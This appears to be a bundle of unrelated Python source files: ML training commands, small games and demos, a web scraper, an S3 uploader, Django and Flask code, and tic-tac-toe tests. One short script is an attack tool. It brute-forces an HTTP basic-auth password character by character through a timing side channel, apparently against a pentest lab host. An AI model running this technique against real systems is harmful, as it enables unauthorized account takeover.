%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_twoview --out_dir ../checkpoints/resnet50_twoview_fast --num_epochs 50 --lr 0.005
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_meta --out_dir ../checkpoints/resnet50_meta_fast --num_epochs 50 --lr 0.005
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_singleview --out_dir ../checkpoints/resnet50_singleview_fast_k5 --num_epochs 50 --lr 0.005 --K_fold 5
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_twoview --out_dir ../checkpoints/resnet50_twoview_fast_k5 --num_epochs 50 --lr 0.005 --K_fold 5
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_metatwoview --out_dir ../checkpoints/resnet50_metatwoview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_singleview --out_dir ../checkpoints/resnet50_singleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_metasingleview --out_dir ../checkpoints/resnet50_metasingleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net effnetb4_singleview --out_dir ../checkpoints/effnetb4_singleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net effnetb4_metasingleview --out_dir ../checkpoints/effnetb4_metasingleview_fast_k5 --num_epochs 30 --lr 0.005 --K_fold 5 --num_workers 8
|
#!/usr/bin/env python3
import utils, open_color, arcade # importing the libraries necessary to run the program
utils.check_version((3,7))
SCREEN_WIDTH = 800 #sets the width of the screen to 800 pixels
SCREEN_HEIGHT = 600 #sets the height of the screen to 600 pixels
SCREEN_TITLE = "Smiley Face Example" #sets the title of the screen to be "Smiley Face Example"
class Faces(arcade.Window): #establishes a new class Faces, which requires a parameter of the type arcade.Window
""" Our custom Window Class""" # describing the class to be "Our Custom Window Class"
def __init__(self): #runs the following code when an instance of the Faces class is initialized
""" Initializer """
# Call the parent class initializer
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
# Show the mouse cursor
self.set_mouse_visible(True)
self.x = SCREEN_WIDTH / 2 #sets the variable x of the Faces instance to the width of the screen /2
self.y = SCREEN_HEIGHT / 2 #sets the variable y of the Faces instance to the height of the screen /2
arcade.set_background_color(open_color.white) #sets the background color of the screen to white
def on_draw(self): #runs the following code whenever the screen is drawn
""" Draw the face """
arcade.start_render() #tells the program to start rendering images
face_x,face_y = (self.x,self.y) #sets the x and y values of the face to the x and y values of the cursor
smile_x,smile_y = (face_x + 0,face_y - 10) #sets the x and y values of the smile to slightly below the center of the circle
eye1_x,eye1_y = (face_x - 30,face_y + 20) #sets the position of the left eye relative to the face
eye2_x,eye2_y = (face_x + 30,face_y + 20) #sets the position of the right eye relative to the face
catch1_x,catch1_y = (face_x - 25,face_y + 25) #sets the position of the left light catch relative to the face
catch2_x,catch2_y = (face_x + 35,face_y + 25) #sets the position of the right light catch relative to the face
arcade.draw_circle_filled(face_x, face_y, 100, open_color.yellow_3) #draws the yellow circle
arcade.draw_circle_outline(face_x, face_y, 100, open_color.black,4) #draws the outline of the face
arcade.draw_ellipse_filled(eye1_x,eye1_y,15,25,open_color.black) #draws the left eye
arcade.draw_ellipse_filled(eye2_x,eye2_y,15,25,open_color.black) #draws the right eye
arcade.draw_circle_filled(catch1_x,catch1_y,3,open_color.gray_2) #draws the left light catch
arcade.draw_circle_filled(catch2_x,catch2_y,3,open_color.gray_2) #draws the right light catch
arcade.draw_arc_outline(smile_x,smile_y,60,50,open_color.black,190,350,4) #draws the smile
def on_mouse_motion(self, x, y, dx, dy): #when the mouse moves, execute the following code
""" Handle Mouse Motion """
self.x = x #sets the x of the instance to the x of the mouse
self.y = y #sets the y of the instance to the y of the mouse
window = Faces() #sets the window as an instance of the faces class
arcade.run() #tells the code to start playing the game |
from matplotlib import pyplot as plt
from matplotlib.patches import Ellipse
from scipy.stats import chi2
import numpy as np
def results(stream, result, config):
pass
def display_err(err):
#print(err)
#for it, i in enumerate(err):
# err[it]= i/(it+1)
plt.plot(err[1:])
#plt.yscale('log')
plt.show()
#plt.savefig('./model/plot.pdf')
def eigsorted(cov):
vals, vecs = np.linalg.eigh(cov)
order = vals.argsort()[::-1]
return vals[order], vecs[:, order]
def display_result(mu,cov, instances):
if(np.shape(mu[0]) != (2,)):
return
plt.plot()
plt.title('model')
i = list(zip(*instances))
plt.scatter(x=i[0], y=i[1])
ax = None
if ax is None:
ax = plt.gca()
for mo in range(len(mu)):
vals, vecs = eigsorted(cov[mo])
theta = np.degrees(np.arctan2(*vecs[:, 0][::-1]))
width, height = 2 * np.sqrt(chi2.ppf(0.5, 2)) * np.sqrt(vals)
ellip = Ellipse(xy=mu[mo], width=width, height=height, angle=theta, alpha=0.5, color='red')
ax.add_artist(ellip)
plt.show()
def plot(config, alg, stream):
if config.plot_2d:
display_result(alg.means, alg.covars, stream[:])
if config.plot_err:
display_err(alg.hist)
|
num = list(map(int, input()))
zero_cnt = 0 # 전체 0으로 바꿀 때 필요한 횟수
one_cnt = 0 # 전체 1으로 바꿀 때 필요한 횟수
if num[0] == 1:
zero_cnt += 1
else:
one_cnt += 1
for i in range(len(num) - 1):
if num[i] != num[i+1]:
if num[i+1] == 1:
zero_cnt += 1
else:
one_cnt += 1
print(min(zero_cnt, one_cnt)) |
# -*- encoding: utf-8 -*-
#from .utils import *
from .CallerClasses import *
from .InteractionMatrix import *
from .DataClasses import *
from .ExperimentClass import *
from .DataGeneration import *
from .logger import *
__version__ = "0.0.2"
__author__ = 'Aleksandra Galitsyna and Dmitry Mylarcshikov'
__email__ = 'agalitzina@gmail.com' |
import pandas as pd
import base64
import os
import pdfkit
import boto3
import datetime
from configparser import ConfigParser
configure = ConfigParser()
configure.read("secret.ini")
ACCESS_KEY = configure.get("AWS", "ACCESS_KEY")
SECRET_KEY = configure.get("AWS", "SECRET_KEY")
BUCKET = configure.get("AWS", "BUCKET")
def store_file_as_pdf(get_latest_ca):
ca_array = []
now = datetime.datetime.now().strftime("%d-%b-%Y")
filename = f"Daily Report ( {now} ).pdf"
ret2 = store_file(filename, get_latest_ca, 'pdf')
return ret2, filename
def store_file(filename, data, typ="pdf"):
if typ == 'pdf':
df = pd.DataFrame(data=data)
df = df.fillna('-')
directory = os.path.dirname(os.path.realpath(__file__))
html_file_path = os.path.join("Daily Report.html")
pdf_file_path = os.path.join(filename)
fd = open(html_file_path, 'w')
intermediate = df.to_html()
fd.write(intermediate)
fd.close()
pdfkit.from_file(html_file_path, pdf_file_path)
uploaded = upload_to_aws(filename, filename)
return uploaded
def upload_to_aws(local_file, s3_file):
bucket = BUCKET
s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY,
aws_secret_access_key=SECRET_KEY)
try:
s3.upload_file(local_file, bucket, s3_file)
print("Upload Successful")
return True
except FileNotFoundError:
print("The file was not found")
return False
except NoCredentialsError:
print("Credentials not available")
return False
|
#from google.appengine.ext import webapp
#[START imports]
import webapp2
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import users
from modelHandlers import departmentHandler, studentHandler
from modelHandlers import courseHandler, scheduleHandler, enrollmentsHandler
from google.appengine.ext.key_range import ndb
#[END imports]
class MainPage(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
self.response.out.write(template.render('main.html',{}))
#self.response.headers['Content-Type'] = 'text/plain'
self.response.out.write('Hello, '+user.nickname())
def post(self):
self.response.out.write('posted!')
''' Using toplevel makes sure that all asynchronous put requests have been handled before handler exits'''
application = ndb.toplevel(webapp2.WSGIApplication([
webapp2.Route(r'/', handler=MainPage, name='Main'),
webapp2.Route(r'/department', handler=departmentHandler, name='department'),
webapp2.Route(r'/course', handler=courseHandler, name='course'),
webapp2.Route(r'/student', handler=studentHandler, name='student'),
webapp2.Route(r'/schedule', handler=scheduleHandler, name='schedule' ),
webapp2.Route(r'/enrollments', handler=enrollmentsHandler, name='enrollments')
], debug=True))
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
|
import requests
import time
from time import sleep
higher = 0
letraTemporal = ''
password = "p4ssw0r"
ip = '192.168.0.29'
status_code = 401
while status_code != 200:
for letra in range(127):
start = time.time()
r = requests.get('http://'+ip+'/authentication/example2/', auth=('hacker', str(password+chr(letra))))
reqtime = time.time() - start
print(password+chr(letra), "=", reqtime, r.status_code)
if reqtime > higher:
higher = reqtime
letraTemporal = chr(letra)
if r.status_code == 200:
status_code = 200
break
password+=letraTemporal
print('Temporal = ' + password)
print('Final = ' + password)
|
#-*- coding:utf-8 -*-
from flask import Flask ,request, g, render_template, url_for, redirect, abort
from manage import blue_print
import config
import json
from account.lib.user_lib import auth_user
from dns.lib.user_domain_lib import get_domain_list_by_user_id
from dns.lib.domain_lib import get_all_domain_dict_lib, if_user_id_have_domain_rights
from dns.model.domain import Domain
@blue_print.route("/domain_list", methods=["GET","POST"])
def domain_list():
auth_result = auth_user()
if not auth_result[0]:
return redirect(auth_result[1])
else:
userinfo = auth_result[1]
user_domain_list = get_domain_list_by_user_id(userinfo['user_id'])
all_domain_list = get_all_domain_dict_lib()
return render_template("manage_domain_list.html", userinfo=userinfo, user_domain_list=user_domain_list, all_domain_list=all_domain_list)
@blue_print.route("/domain", methods=["GET","POST"])
def domain():
auth_result = auth_user()
if not auth_result[0]:
return redirect(auth_result[1])
else:
userinfo = auth_result[1]
domain_id = request.args.get('domain_id', '')
if not Domain.test_if_domain_id_exists(int(domain_id)):
return redirect("/manage/domain_list")
user_domain_list = get_domain_list_by_user_id(userinfo['user_id'])
domain_info = Domain.get_domain_by_domain_id(domain_id)
if if_user_id_have_domain_rights(userinfo['user_id'], domain_id):
return render_template("manage_domain_have_rights.html", userinfo=userinfo, user_domain_list=user_domain_list, domain_info=domain_info)
else:
return render_template("manage_domain_no_rights.html", userinfo=userinfo, user_domain_list=user_domain_list, domain_info=domain_info)
|
import parser
import json
def get_new_in_radius(radius):
houses = parser.results_in_radius(radius)
with open("cache/checked.json", "r") as json_file:
checked = json.load(json_file)
new = []
for house in houses:
if house["PublicatieId"] in checked:
continue
else:
new.append(house)
checked.append(house["PublicatieId"])
with open("cache/checked.json", "w") as json_file:
json.dump(checked, json_file)
return new
|
'''
Selfedu001133PyBegin_v11_list_TASKmy04_20200621.py
нарисовать два треугольника, согласно образцу
[!] задание давать только после последовательного выведения
сходящихся элементов
подсказка 1: замените точки числами (количество элементов)
'''
n = int(input("Количество элементов списка: "))
list1 = []
for i in range(n):
list1.append(i * '*')
print("задано количество элементов: ", n)
for i in range(len(list1) - 1):
print(list1[i + 1], list1[n - 1 - i])
|
import os, sys
import json
import configparser
import bpy, bpy_types
import bmesh
import struct
# TODO:
# - Apply modifiers before export
# - Export list of assets and textures (and code to preload)
# e.g. /Applications/Blender/blender.app/Contents/MacOS/blender -b srcart/forest.blend -P script/export_scene.py -- ld33_export.cfg
def texturesForObject( obj ):
result = []
for mat_slot in obj.material_slots:
for mtex_slot in mat_slot.material.texture_slots:
if mtex_slot:
if hasattr(mtex_slot.texture , 'image'):
imgfile = mtex_slot.texture.image.filepath
result.append( imgfile )
print(result)
return result
def exportMeshObj( mesh, meshExportName ):
#DBG
#if (meshExportName.find('TreeOakMesh')==-1):
# return
# Triangulate the mesh
bm = bmesh.new()
bm.from_mesh(mesh)
bmesh.ops.triangulate( bm, faces=bm.faces )
bm.to_mesh(mesh)
bm.free()
# This could be better..
# HEADER:
# 'MESH' 4cc (byte[4])
# num_triangles uint32_t
header = struct.pack( '<4sL', str.encode("MESH"), len(mesh.polygons) )
packedDataList = [ header ]
uv_layer = mesh.uv_layers['UVMap'].data[:]
# print(uv_layer)
# print ("NUM UV", len(uv_layer))
# print ("NUM VERT", len(mesh.vertices))
stndx = 0;
for face in mesh.polygons:
verts = face.vertices[:]
# for now, only triangles
assert(len(verts)==3)
packedTri = []
for vndx in verts:
v = mesh.vertices[vndx]
uv = uv_layer[stndx]
stndx += 1
#print(v.co, v.normal, uv.uv )
# pack up the vert data
packedVert = struct.pack( '<3f3f4f',
v.co[0], v.co[2], v.co[1],
v.normal[0], v.normal[2], v.normal[1],
uv.uv[0], 1.0-uv.uv[1], 0.0, 0.0 );
packedTri.append(packedVert)
packedTri.reverse()
packedDataList += packedTri
# Write the mesh data
packedData = b''.join( packedDataList )
print ("----", meshExportName, len(packedData), len(mesh.polygons) )
with open( meshExportName, 'bw') as fp:
fp.write( packedData )
def getConfig():
# Extract the script arguments
argv = sys.argv
try:
index = argv.index("--") + 1
except:
index = len(argv)
argv = argv[index:]
print ("Argv is ", argv)
# read the export config
cfg = configparser.ConfigParser()
if (len(argv)==0):
return None
cfg.read(argv[0])
return cfg
def exportScene( cfg, sceneName ):
meshes = {}
for obj in bpy.data.objects:
if type(obj.data) == bpy_types.Mesh and not obj.data.name in meshes:
# Only export objects on layer 0
if not obj.layers[0]:
continue
meshes[obj.data.name] = obj.data
print ("Exporting Meshes...")
meshPath = cfg['Paths']['MeshPath']
for name, mesh in meshes.items():
meshExportName = os.path.join( meshPath, "MESH_" + name + ".dat" )
exportMeshObj( mesh, meshExportName )
print ("Exporting Scene...")
scenePath = cfg['Paths']['ScenePath']
sceneObjs = []
for obj in bpy.data.objects:
# Only export objects on layer 0
if not obj.layers[0]:
continue
if type(obj.data) != bpy_types.Mesh:
continue
sceneObj = { "name" : obj.name,
"loc" : (obj.location.x, obj.location.z, obj.location.y),
"rot" : tuple(obj.rotation_euler),
"scl" : (obj.scale.x, obj.scale.z, obj.scale.y ),
"mesh" : "MESH_" + obj.data.name }
textures = texturesForObject( obj )
print (obj.name, textures )
if (len(textures) > 1):
print ("WARNING: Object ", obj.name, " has multiple textures")
if (len(textures)==0):
print("WARNING: Object ", obj.name, " missing texture" );
textures = [ 'missing.png']
sceneObj['texture'] = os.path.split(textures[0])[-1]
sceneObjs.append( sceneObj )
# locStr = "%f,%f,%f" % tuple(obj.location)
# rotStr = "%f,%f,%f" % tuple(obj.rotation_euler)
# if type(obj.data) == bpy_types.Mesh:
# print ("MESH: ", obj.name, obj.data.name, locStr, rotStr )
sceneFile = os.path.join( scenePath, sceneName + ".json")
print (sceneFile)
with open(sceneFile, 'w') as fp:
json.dump( sceneObjs, fp, sort_keys=True, indent=4, separators=(',', ': '))
def main():
print ("LD exporter...")
# Get the original scene name (todo: make better)
for a in range(len(sys.argv)):
if (sys.argv[a]=='--'):
break
if (sys.argv[a]=='-b'):
sceneName = sys.argv[a+1]
sceneName = os.path.basename( sceneName )
sceneName = os.path.splitext( sceneName )[0]
cfg = getConfig()
if cfg is None:
print ("ERROR: Missing config, export stopped")
return
exportScene(cfg, sceneName )
if __name__=='__main__':
main()
|
import json
with open('know-how.json', 'r') as f:
data = json.load(f)
#Get the questions
import requests
# from lxml import html
counter = 0
import re
regex = '(?<=href=\"\/\/www\.wikihow\.com\/)[A-Za-z\-]*(?=\")'
def scrape(data):
category = data["name"]
print(category)
try:
page = requests.get("https://www.wikihow.com/Category:" + category)
pat = re.findall(regex, page.text)
data["list"] = pat
except Exception as e:
print(e)
print(category)
if "children" in data:
for child in data["children"]:
scrape(child)
scrape(data)
with open('ques_list.json', 'w') as f:
json.dump(data, f, indent=4, sort_keys=False)
# for j in tuplist:
# page = requests.get("https://www.wikihow.com/Category:" + )
# tree = html.fromstring(page.content)
# href = tree.xpath('//div[contains(@class, "section minor_section")]/ul/li/a/@href')
# title = tree.xpath('//div[contains(@class, "section minor_section")]/ul/li/a/text()')
# print(title)
# for i in range(len(href)):
# counter = counter + 1
# queslist.append((href[i], title[i]))
# print(j[1], counter)
# with open("wikihow_question_nos.txt", "a") as f:
# for i in range(len(queslist)):
# f.write(str(i) + '\t' + queslist[i][1] + '\n') |
import socket
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect(('data.pr4e.org', 80))
cmd = 'GET http://data.pr4e.org/intro-short.txt HTTP/1.0\r\n\r\n'.encode() #encode > convert from unicode to UTF-8
mysock.send(cmd)
while True:
data = mysock.recv(512)
if (len(data) < 1):
break
print(data.decode()) #decode > convert from UTF-8 to [unicode > owen lang]
mysock.close()
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'OpinsysAuthProvider.school'
db.add_column('opinsys_opinsysauthprovider', 'school', self.gf('django.db.models.fields.CharField')(default='', max_length=200), keep_default=False)
def backwards(self, orm):
# Deleting field 'OpinsysAuthProvider.school'
db.delete_column('opinsys_opinsysauthprovider', 'school')
models = {
'dreamuserdb.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'organisation': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_providers'", 'to': "orm['dreamuserdb.Organisation']"})
},
'dreamuserdb.organisation': {
'Meta': {'object_name': 'Organisation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'opinsys.opinsysauthprovider': {
'Meta': {'object_name': 'OpinsysAuthProvider', '_ormbases': ['dreamuserdb.AuthProvider']},
'authprovider_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['dreamuserdb.AuthProvider']", 'unique': 'True', 'primary_key': 'True'}),
'dc': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'school': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['opinsys']
|
import unittest
from game import Game
from players import AIPlayer
class TestWinningStateDetection(unittest.TestCase):
def test_top_row_is_winning(self):
game_board = Game()
game_board.board = [
"X", "X", "X",
"O", "O", None,
None,None,None
]
is_win = game_board.is_winning_board
self.assertTrue(is_win)
assert game_board.winner_symbol == "X"
def test_top_left_diagonal_row_is_winning(self):
game_board = Game()
game_board.board = [
"O", "X", "X",
"O", "O", "x",
None,"x","O"
]
is_win = game_board.is_winning_board
self.assertTrue(is_win)
assert game_board.winner_symbol == "O"
def test_right_column_is_winning(self):
game_board = Game()
game_board.board = [
"O", "O", "X",
"O", "O", "X",
None,"x","X"
]
is_win = game_board.is_winning_board
self.assertTrue(is_win)
assert game_board.winner_symbol == "X"
def test_no_winning_state_1(self):
game_board = Game()
game_board.board = [
"O", "O", "X",
"O", None, "X",
None,"x",None
]
is_win = game_board.is_winning_board
self.assertFalse(is_win)
assert game_board.winner_symbol == None
def test_no_winning_state_2(self):
game_board = Game()
game_board.board = [
"O", "O", "X",
"O", "O", "X",
None,"x",None
]
is_win = game_board.is_winning_board
self.assertFalse(is_win)
assert game_board.winner_symbol == None
class TestEndGameStateDetection(unittest.TestCase):
def test_no_more_moves_game_ended_draw(self):
game_board = Game()
game_board.board = [
"X", "O", "X",
"O", "X", "X",
"O", "X", "O"
]
is_win = game_board.is_winning_board
self.assertTrue(game_board.is_game_ended)
self.assertFalse(is_win)
assert game_board.winner_symbol == None
def test_no_more_moves_game_ended_win(self):
game_board = Game()
game_board.board = [
"X", "O", "O",
"O", "X", "X",
"O", "X", "X"
]
is_win = game_board.is_winning_board
self.assertTrue(game_board.is_game_ended)
self.assertTrue(is_win)
assert game_board.winner_symbol == "X"
def test_quick_winning_state_game_ended(self):
game_board = Game()
game_board.board = [
"X", "O", None,
"O", "X", None,
None,None,"X"
]
is_win = game_board.is_winning_board
self.assertTrue(game_board.is_game_ended)
self.assertTrue(is_win)
assert game_board.winner_symbol == "X"
def test_long_game_winning_game_ended(self):
game_board = Game()
game_board.board = [
"X", "O", None,
"O", "X","X",
"O", "O","X"
]
is_win = game_board.is_winning_board
self.assertTrue(game_board.is_game_ended)
self.assertTrue(is_win)
assert game_board.winner_symbol == "X"
def test_short_game_not_ended(self):
game_board = Game()
game_board.board = [
"X", "O", None,
None, None,None,
"O", None,"X"
]
is_win = game_board.is_winning_board
self.assertFalse(game_board.is_game_ended)
self.assertFalse(is_win)
assert game_board.winner_symbol == None
def test_long_game_not_ended(self):
game_board = Game()
game_board.board = [
"X", "O", "X",
None, None,"O",
"O", "X","X"
]
is_win = game_board.is_winning_board
self.assertFalse(game_board.is_game_ended)
self.assertFalse(is_win)
assert game_board.winner_symbol == None
class TestAIPlayer(unittest.TestCase):
def setUp(self):
self.board_and_results = [
# 0
{
"board_to_score": [
"x", "o", "x",
None, "o", "o",
"x", None, "x"
],
"expected_score": [
None, None, None,
15, None, None,
None, 15, None,
],
"expected_moves": [3,7],
"player_args": ("o", "x")
},
# 1
{
"board_to_score": [
"x", "o", "x",
None, "o", "o",
None,"x", "x"
],
"expected_score": [
None, None, None,
8, None, None,
12, None, None,
],
"expected_moves": [6],
"player_args": ("x", "o")
},
# 2
{
"board_to_score": [
"x", "o", "x",
None, "o", "o",
None, None, "x"
],
"expected_score": [
None, None, None,
8, None, None,
5, 8, None,
],
"expected_moves": [3,7],
"player_args": ("x", "o")
},
# 3 DUPE?
{
"board_to_score": [
"x", "o", "x",
None, "o", None,
None, None, "x"
],
"expected_score": [
None, None, None,
4, None, 8,
5, 11, None,
],
"expected_moves": [7],
"player_args": ("o", "x")
},
# 4
{
"board_to_score": [
None, None, None,
None, "x", None,
None, None, "o"
],
"expected_score": [
3, 6, 5,
6, None, 7,
5, 7, None,
],
"expected_moves": [5,7],
"player_args": ("o", "x")
},
# 5
{
"board_to_score": [
None, "x", None,
None, "o", None,
None, None, None
],
"expected_score": [
5, None, 5,
6, None, 6,
4, 5, 4,
],
"expected_moves": [3,5],
"player_args": ("o", "x")
},
# 6
{
"board_to_score": [
None, None, None,
None, None, None,
None, None, None
],
"expected_score": [
3, 2, 3,
2, 7, 2,
3, 2, 3,
],
"expected_moves": [4],
"player_args": ("o", "x")
},
# 7
{
"board_to_score": [
"x", "o", "o",
"o", "x", "x",
"x", "x", "o"
],
"expected_score": [
None, None, None,
None, None, None,
None, None, None,
],
"expected_moves": [],
"player_args": ("o", "x")
},
# 8
{
"board_to_score": [
"x", None, "x",
"o", "o", None,
None, None, "x"
],
"expected_score": [
None, 8, None,
None, None, 15,
4, 4, None,
],
"expected_moves": [5],
"player_args": ("o", "x")
},
# 9
{
"board_to_score": [
"x", None, "x",
None, "o", None,
None, None, None
],
"expected_score": [
None, 11, None,
7, None, 7,
4, 6, 4,
],
"expected_moves": [1],
"player_args": ("o", "x")
},
# 10
{
"board_to_score": [
"o", "x", None,
None, "x", None,
None, None, None
],
"expected_score": [
None, None, 4,
7, None, 6,
5, 10, 3,
],
"expected_moves": [7],
"player_args": ("o", "x")
},
# 11
{
"board_to_score": [
"x", None, None,
None, "o", None,
None, None, "x"
],
"expected_score": [
None, 7, 6,
7, None, 7,
6, 7, None,
],
"expected_moves": [1,3,5,7],
"player_args": ("o", "x")
},
# 12 sure win for "o"
{
"board_to_score": [
"x", "o", "x",
"X", "o", "o",
None, None, "x"
],
"expected_score": [
None, None, None,
None, None, None,
4, 11, None,
],
"expected_moves": [7],
"player_args": ("o", "x")
},
# 13 I was able to win this scenrio
{
"board_to_score": [
None, None, "x",
None, "o", "x",
None, None, None
],
"expected_score": [
5, 7, None,
5, None, None,
3, 6, 9,
],
"expected_moves": [8],
"player_args": ("o", "x")
},
# 14 I was able to win this scenrio
{
"board_to_score": [
None, "o", None,
None, "x", "x",
None, "o", "o"
],
"expected_score": [
4, None, 5,
10, None, None,
9, None, None,
],
"expected_moves": [3],
"player_args": ("x", "o")
},
]
def test_potentialboard_states(self):
"""
Make sure AI behaves as expected for some scenario
"""
for i, boards in enumerate(self.board_and_results):
print "Scoring board: ", i
board_to_score = boards['board_to_score']
expected_score = boards['expected_score']
expected_moves = boards['expected_moves']
player_args = boards['player_args']
ai_player = AIPlayer( *player_args)
board = ai_player.score_current_board(board_to_score)
self.assertEqual(
board,
expected_score
)
self.assertEqual(
ai_player.get_potential_moves(board_to_score),
expected_moves
)
if __name__ == '__main__':
unittest.main() |
from metric.metric_abstract import AbstractClassifierMetric
import numpy as np
# class MyEvaluator(AbstractEvaluation):
# def evaluate_dataset(self,dataset,plabel,pprob):
# pa_events = convertAndMergeToEvent(dataset.set_window,plabel)
# a_events = convertAndMergeToEvent(dataset.set_window,dataset.label)
# return self.qualitymeasurement(pa_events,a_events)
# def confusion_matrix_dataset(self, dataset,plabel,pprob):
# pa_events = convertAndMergeToEvent(dataset.set_window,plabel)
# a_events =dataset.a_events # convertAndMergeToEvent(dataset.set_window,dataset.label)
# print(a_events)
# cm=myaccuracy(pa_events,a_events)
# return cm
# def evaluate(self,time_window, rlabel,plabel,pprob):
# pa_events = convertAndMergeToEvent(time_window,plabel)
# a_events = convertAndMergeToEvent(time_window,rlabel)
# return self.qualitymeasurement(pa_events,dataset.a_events)
# def confusion_matrix(self, time_window, rlabel,plabel,pprob):
# pa_events = convertAndMergeToEvent(dataset,plabel)
# a_events = convertAndMergeToEvent(time_window,rlabel)
# cm=myaccuracy(pa_events,a_events)
# return cm
# def qualitymeasurement(self,p_events,r_events):
# cm=myaccuracy(p_events,r_events)
# s=np.array(cm).sum().sum()
# correct=0
# for i in range(0,len(cm)):
# correct+=cm[i,i]
# return correct/s
class ClassicalMetric(AbstractClassifierMetric):
# def evaluate_dataset(self,dataset,plabel,pprob):
# return self.evaluate(dataset.set,dataset.label,plabel,pprob,dataset.acts)
# def confusion_matrix_dataset(self, dataset,plabel,pprob):
# return self.confusion_matrix(dataset.set,dataset.label,plabel,pprob,dataset.acts)
# def evaluate(self, rset, rlabel,plabel,pprob,labels):
# ;
# def confusion_matrix(self, rset, rlabel,plabel,pprob,labels):
# cm=confusion_matrix(rlabel,plabel,labels)
# return cm
def get_tp_fp_fn_tn(self, cm):
cm = np.array(cm)
np.seterr(divide='ignore', invalid='ignore')
TP = np.diag(cm)
FP = np.sum(cm, axis=0) - TP
FN = np.sum(cm, axis=1).T - TP
num_classes = len(cm)
TN = []
for i in range(num_classes):
temp = np.delete(cm, i, 0) # delete ith row
temp = np.delete(temp, i, 1) # delete ith column
TN.append(temp.sum())
return TP, FP, FN, TN
def eval_cm(self, cm, average=None):
pass
# def event_cofusion_matrix(self, p_activity,r_activity):
# ;
class Accuracy(ClassicalMetric):
def evaluate(self, rset, rlabel, plabel, pprob, labels):
return sklearn.metrics.accuracy_score(rlabel, plabel)
def eval_cm(self, cm, average=None):
TP, FP, FN, TN = self.get_tp_fp_fn_tn(cm)
a = TP.sum()/cm.sum()
if (average is None):
return None
return a
class Precision(ClassicalMetric):
def evaluate(self, rset, rlabel, plabel, pprob, labels):
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average='macro')
return p
def eval_cm(self, cm, average=None):
TP, FP, FN, TN = self.get_tp_fp_fn_tn(cm)
p = TP/(TP+FP)
if (average is None):
return p
return np.average(p[~np.isnan(p)])
class Recall(ClassicalMetric):
def evaluate(self, rset, rlabel, plabel, pprob, labels):
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average='macro')
return r
def eval_cm(self, cm, average=None):
TP, FP, FN, TN = self.get_tp_fp_fn_tn(cm)
r = TP/(TP+FN)
if (average is None):
return r
return np.average(r[~np.isnan(r)])
class F1Evaluator(ClassicalMetric):
def evaluate(self, rset, rlabel, plabel, pprob, labels):
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average='macro')
return f
def eval_cm(self, cm, average=None):
TP, FP, FN, TN = self.get_tp_fp_fn_tn(np.array(cm))
# print(np.array(TP).shape,np.array(FP).shape,np.array(FN).shape,np.array(TN).shape)
# print(TP,FP,FN,TN)
p = TP/(TP+FP)
r = TP/(TP+FN)
f = 2*r*p/(r+p)
if (average is None):
return f
return np.average(f[~np.isnan(f)])
class All(ClassicalMetric):
def evaluate(self, rset, rlabel, plabel, pprob, labels, average='macro'):
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average=average)
return {'precision': p, 'recall': r, 'f1': f}
def eval_cm(self, cm, average=None):
TP, FP, FN, TN = self.get_tp_fp_fn_tn(np.array(cm))
# print(np.array(TP).shape,np.array(FP).shape,np.array(FN).shape,np.array(TN).shape)
# print(TP,FP,FN,TN)
p = TP/(TP+FP)
r = TP/(TP+FN)
f = 2*r*p/(r+p)
if (average is None):
return f
return np.average(f[~np.isnan(f)])
# def myaccuracy(predicted0,real0):
# begin=real0.StartTime.min()
# end=real0.EndTime.max()
# predicted=[p for i,p in predicted0.iterrows()]
# real=[p for i,p in real0.iterrows()]
# # predicted.append({'StartTime':begin,'EndTime':end,'Activity':0})
# # real.append({'StartTime':begin,'EndTime':end,'Activity':0})
# events=merge_split_overlap_IntervalTree(real,predicted)
# #predictedtree=makeIntervalTree(labels)
# cm=np.zeros((len(activities),len(activities)))
# for eobj in events:
# e=eobj.data
